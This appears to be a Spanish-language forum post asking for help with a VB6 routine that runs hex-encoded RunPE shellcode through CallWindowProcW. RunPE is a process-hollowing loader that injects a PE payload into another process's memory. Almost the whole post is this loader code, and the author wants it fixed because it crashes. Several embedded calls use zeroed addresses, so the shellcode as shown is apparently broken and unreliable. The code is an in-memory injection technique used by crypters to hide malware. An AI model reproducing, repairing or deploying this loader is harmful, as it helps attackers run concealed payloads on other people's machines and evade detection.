runpe source - https://github.com/d35ha/RunPE/tree/master
Holla Tomé un runpe, extraje el código de máquina y lo convertí a hex
tengo 2 preguntas
1. ¿Crees que mis argumentos son correctos al observar el código C++?
2. ¿Cómo indexar bytes desde el punto de entrada?
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
He intentado absolutamente todo pero no funciona y no funciona WereFault sigue apareciendo
¿Me puedes ayudar?
Converted
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Sub memory(ByVal path As String, payload() As Byte)
Dim ShellCode As String
ShellCode = "5589E55381ECC40000008B450C8945F08B45F00FB700663D4D5A0F85D30300008B45F08B403C89C28B450C01D08945EC8B45EC8B003D504500000F85B3030000C744240844000000C7442404000000008D8574FFFFFF890424E8000000005EC744240810000000C7442404000000008D45B8890424E800000000798D45B8894424248D8574FFFFFF89442420C744241C00000000C744241800000000C744241404000000C744241000000000C744240C00000000C744240800000000C7442404000000008B4508890424A100000000FFD083EC2885C00F95C084C00F8414030000C7042400000000A100000000FFD083EC04C74424040D000000890424A100000000FFD083EC088945E8C7042400000000A100000000FFD083EC04C74424041A000000890424A100000000FFD083EC088945E4C7042400000000A100000000FFD083EC04C744240429000000890424A100000000FFD083EC088945E0C7042400000000A100000000FFD083EC04C74424043B000000890424A100000000FFD083EC088945DCC744240C04000000C744240800100000C744240404000000C70424000000008B45E8FFD083EC108945D88B45D8C700070001008B45BC8B55D889542404890424A100000000FFD083EC0885C00F95C084C00F84190200008B45D88B80A400000083C00889C1"
ShellCode = ShellCode & "8B45B8C744241000000000C744240C040000008D9570FFFFFF89542408894C24048904248B45E0FFD083EC148B45EC8B40348B9570FFFFFF39D07541C704244E000000A100000000FFD083EC04C744240458000000890424A100000000FFD083EC088945D48B9570FFFFFF8B45B8895424048904248B45D4FFD083EC088B45EC8B50508B45EC8B403489C18B45B8C744241040000000C744240C0030000089542408894C24048904248B45E4FFD083EC148945D0837DD0000F844D0100008B45EC8B50548B45B8C7442410000000008954240C8B550C895424088B55D0895424048904248B45DCFFD083EC14C745F4000000008B45EC0FB740060FB7C03945F47D6D8B45F08B403C89C28B450C8D0C028B55F489D0C1E00201D0C1E00301C805F80000008945CC8B45CC8B50108B45CC8B48148B450C01C889C38B45CC8B480C8B45D001C889C18B45B8C7442410000000008954240C895C2408894C24048904248B45DCFFD083EC148345F401EB848B45EC8D50348B45D88B80A400000083C00889C18B45B8C744241000000000C744240C0400000089542408894C24048904248B45DCFFD083EC148B45EC8B50288B45D001C28B45D88990B0000000C704244E000000A100000000FFD083EC04C74424046D000000890424A100000000FFD083EC088945C88B45BC8B"
ShellCode = ShellCode & "55D8895424048904248B45C8FFD083EC088B45BC890424A100000000FFD083EC04C744240800800000C7442404000000008B450C890424A100000000FFD083EC0C908B5DFCC9C3909090"
Dim byteCount As Long
byteCount = Len(ShellCode) \ 2
Dim byteArray() As Byte
ReDim byteArray(byteCount - 1)
Dim i As Long
Dim k As Long
For i = 1 To Len(ShellCode) Step 2
byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2))
k = k + 1
Next i
CallWindowProcW VarPtr(byteArray(0)), StrPtr(path), VarPtr(payload(0)), 0, 0
End Sub